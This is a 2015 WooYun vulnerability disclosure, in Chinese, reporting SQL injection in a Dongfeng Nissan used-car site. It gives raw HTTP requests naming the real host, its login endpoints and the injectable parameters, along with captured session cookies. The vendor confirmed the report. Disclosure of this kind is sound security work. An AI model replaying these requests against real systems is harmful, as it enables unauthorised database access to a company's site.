当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0151306

漏洞标题:东风日产某站多处注入打包

相关厂商:东风日产乘用车公司

漏洞作者: 深度安全实验室

提交时间:2015-11-02 17:36

修复时间:2015-12-17 17:42

公开时间:2015-12-17 17:42

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-11-02: 细节已通知厂商并且等待厂商处理中
2015-11-02: 厂商已经确认,细节仅向厂商公开
2015-11-12: 细节向核心白帽子及相关领域专家公开
2015-11-22: 细节向普通白帽子公开
2015-12-02: 细节向实习白帽子公开
2015-12-17: 细节向公众公开

简要描述:

东风日产某站多处注入打包

详细说明:

东风日产某站多处注入打包

漏洞证明:

1、东风日产某站多处注入打包,多个注入点分别如下:

POST /usedcaradmin/login_action.php HTTP/1.1
Content-Length: 164
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://livina.dongfeng-nissan.com.cn
Cookie: PHPSESSID=3glkp6jaf9m5jdts9in1u0um15; usedcar_search=2%7C1%2C1%7C1%2C1%7C%B6%FE%CA%D6%B3%B5+%D7%A8%D3%AA%B5%EA; usedcar_browse=217095; Hm_lvt_792279c9567cf21aaf8f5e836d10d910=1441724084,1441724223,1441724235,1441724287; Hm_lpvt_792279c9567cf21aaf8f5e836d10d910=1441724287; _gscu_1779680562=41723840r1wsdk18; _gscs_1779680562=41723840ssdco218|pv:8; _gscbrs_1779680562=1; _smt_uid=55eef5c0.3673b26c; Hm_lvt_3c56a65b4ff83dde6d1d2d90d63f0957=1441723840; Hm_lpvt_3c56a65b4ff83dde6d1d2d90d63f0957=1441723840; Hm_lvt_af18134dd3e7b783824beb5cdf5250d8=1441724084,1441724228,1441724235,1441724294; Hm_lpvt_af18134dd3e7b783824beb5cdf5250d8=1441724294; _gscu_362024299=41723975nivr8r18; _gscs_362024299=41723975x1cdmy18|pv:8; _gscbrs_362024299=1; HMACCOUNT=51327978F473890A; used_left_ad=0; used_right_ad=0
Host: livina.dongfeng-nissan.com.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
SPACCOUNT=*&SPPASSWORD=g00dPa%24%24w0rD

SPACCOUNT参数有问题;

http://livina.dongfeng-nissan.com.cn/spadmin/index.php?CarState=1&EndTime=*&SatTime=1

EndTime参数有问题;

POST /includes/sp_login_action.php?act=login HTTP/1.1
Content-Length: 172
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://livina.dongfeng-nissan.com.cn
Cookie: PHPSESSID=3glkp6jaf9m5jdts9in1u0um15; usedcar_search=2%7C1%2C1%7C1%2C1%7C%B6%FE%CA%D6%B3%B5+%D7%A8%D3%AA%B5%EA; usedcar_browse=217095; Hm_lvt_792279c9567cf21aaf8f5e836d10d910=1441724084,1441724223,1441724235,1441724287; Hm_lpvt_792279c9567cf21aaf8f5e836d10d910=1441724287; _gscu_1779680562=41723840r1wsdk18; _gscs_1779680562=41723840ssdco218|pv:8; _gscbrs_1779680562=1; _smt_uid=55eef5c0.3673b26c; Hm_lvt_3c56a65b4ff83dde6d1d2d90d63f0957=1441723840; Hm_lpvt_3c56a65b4ff83dde6d1d2d90d63f0957=1441723840; Hm_lvt_af18134dd3e7b783824beb5cdf5250d8=1441724084,1441724228,1441724235,1441724294; Hm_lpvt_af18134dd3e7b783824beb5cdf5250d8=1441724294; _gscu_362024299=41723975nivr8r18; _gscs_362024299=41723975x1cdmy18|pv:8; _gscbrs_362024299=1; HMACCOUNT=51327978F473890A; used_left_ad=0; used_right_ad=0
Host: livina.dongfeng-nissan.com.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
SPACCOUNT=4111111111111111*&SPPASSWORD=2222

SPACCOUNT参数有问题;
2、以第一个注入点为例,POST型注入,SPACCOUNT参数有问题;

1.png


3、取当前库:

2.png


4、延时注入,很慢,其他两个注入点跑出的结果与上述一致,不再列举了!

修复方案:

版权声明:转载请注明来源 深度安全实验室@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2015-11-02 17:41

厂商回复:

感谢关注,此漏洞已被提交过,正在修复中,请谅解!谢谢!

最新状态:

暂无


漏洞评价:

评价